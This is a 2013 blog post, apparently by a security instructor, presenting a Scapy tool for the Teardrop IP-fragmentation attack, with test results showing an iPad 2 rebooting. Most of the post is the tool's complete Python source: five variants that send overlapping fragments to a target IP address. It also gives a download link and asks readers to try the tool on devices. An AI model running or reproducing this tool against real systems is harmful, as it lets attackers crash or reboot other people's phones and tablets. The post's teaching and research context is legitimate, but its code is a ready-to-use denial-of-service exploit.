Teardrop Attack in Scapy

Today at the MPICT con, Steve Hailey said the Teardrop attack works on mobile devices--specifically on old Android devices and Blackberries.

The attack is explained here:

http://www.juniper.net/techpubs/software/junos-es/junos-es93/junos-es-swconfig-security/understanding-teardrop-attacks.html

I found an instructive Wireshark tutorial with a packet capture here:

http://ask.wireshark.org/questions/8574/wireshark-teardrop-attack-help

And I wrote my own attack tool that runs in Kali Linux. The code is below, and you can download the file here:

http://samsclass.info/123/proj10/tear

Positive Results

Success! I just got this tweet! RT @ksigler: @sambowne iPad 2 WiFi only, ios6.01 = vulnerable to payload 1, 2, 4, but not 0, 3. Causes device to automatically reboot.

Negative Results

This attack had no effect on these targets I tested:

Please Help

I am hoping someone will have a device it works on.

Steve said it freezes the screen, and you need to take the battery out to restart the phone.

If you get it working, please let me know on Twitter @sambowne or by email sbowne@ccsf.edu

Thanks!

Attack Tool Code

#!/usr/bin/env python
import sys
from scapy.all import *

total = len(sys.argv)
if total != 3:
  print "Performs teardrop attack from Kali Linux"
  print " "
  print "Usage: ./tear TARGET-IP ATTACK-CODE"
  print "   Attack Codes:"
  print "   0: small payload (36 bytes), 2 packets, offset=3x8 bytes"
  print "   1: large payload (1300 bytes), 2 packets, offset=80x8 bytes"
  print "   2: large payload (1300 bytes), 12 packets, offset=80x8 bytes"
  print "   3: large payload (1300 bytes), 2 packets, offset=3x8 bytes"
  print "   4: large payload (1300 bytes), 2 packets, offset=10x8 bytes"
  

target=str(sys.argv[1])
attack=sys.argv[2]

print 'Attacking target ' + target + ' with attack ' + attack

if attack == '0':
  print "Using attack 0"
  size=36
  offset=3
  load1="\x00"*size
  
  i=IP()
  i.dst=target
  i.flags="MF"
  i.proto=17
  
  size=4
  offset=18
  load2="\x00"*size

  j=IP()
  j.dst=target
  j.flags=0
  j.proto=17
  j.frag=offset
  
  send(i/load1)
  send(j/load2)

elif attack == '1':
  print "Using attack 1"
  size=1300
  offset=80
  load="A"*size
  
  i=IP()
  i.dst=target
  i.flags="MF"
  i.proto=17
  
  j=IP()
  j.dst=target
  j.flags=0 
  j.proto=17
  j.frag=offset
  
  send(i/load)
  send(j/load)

elif attack == '2':
  print "Using attack 2"
  print "Attacking with attack 2"
  size=1300
  offset=80
  load="A"*size
  
  i=IP()
  i.dst=target
  i.proto=17
  i.flags="MF"
  i.frag=0
  send(i/load)

  print "Attack 2 packet 0"
  
  for x in range(1, 10):
    i.frag=offset
    offset=offset+80
    send(i/load)
    print "Attack 2 packet " + str(x)
  
  i.frag=offset
  i.flags=0
  send(i/load)

elif attack == '3':
  print "Using attack 3"
  size=1336
  offset=3
  load1="\x00"*size
  
  i=IP()
  i.dst=target
  i.flags="MF"
  i.proto=17
  
  size=4
  offset=18
  load2="\x00"*size
  
  j=IP()
  j.dst=target
  j.flags=0
  j.proto=17
  j.frag=offset
  
  send(i/load1)
  send(j/load2)

else:         # attack == 4
  print "Using attack 4"
  size=1300
  offset=10
  load="A"*size
  
  i=IP()
  i.dst=target
  i.flags="MF"
  i.proto=17
  
  j=IP()
  j.dst=target
  j.flags=0
  j.proto=17
  j.frag=offset
  
  send(i/load)
  send(j/load)

print "Done!"


Posted 2:21 PM 6-20-13 by Sam Bowne
Updated 3:18 PM with iPad 2 results & reformatted
More negative results added 6:23 pm 6-20-13